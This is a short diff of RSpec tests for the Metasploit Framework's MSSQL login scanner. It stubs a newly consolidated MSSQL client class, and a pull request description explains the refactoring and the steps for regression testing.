         expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::INCORRECT
       end
     end
 
     context 'when the login succeeds' do
+      let(:client) { instance_double(Rex::Proto::MSSQL::Client) }
       it 'returns a result object with a status of Metasploit::Model::Login::Status::SUCCESSFUL' do
         my_scanner = login_scanner
-        expect(my_scanner).to receive(:mssql_login).and_return true
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:initialize).and_return(client)
+        allow_any_instance_of(Rex::Proto::MSSQL::Client).to receive(:mssql_login).and_return(true)
+        allow(client).to receive(:disconnect)
         expect(my_scanner.attempt_login(pub_blank).status).to eq Metasploit::Model::Login::Status::SUCCESSFUL
       end
     end


### PR DESCRIPTION
This continues the work started in https://github.com/rapid7/metasploit-framework/pull/18615 

Before adding an MSSQL session type, we need a standalone client class, in addition to a mixin. This PR consolidates the two instances of MSSQL client classes, consolidates them, and converts the consolidated mixin into a class that all existing MSSQL modules have been tweaked to work with. 

To test: 
- Boot up an MSSQL instance, and take note of the machine's ip
- load up any modules changed in this pr. Set `rhost` to the target's ip, `rport` to the port MSSQL is running on (usually 1433), `username`, `password`, and any other required options.
- run the module
- compare behavior to master. Nothing should have changed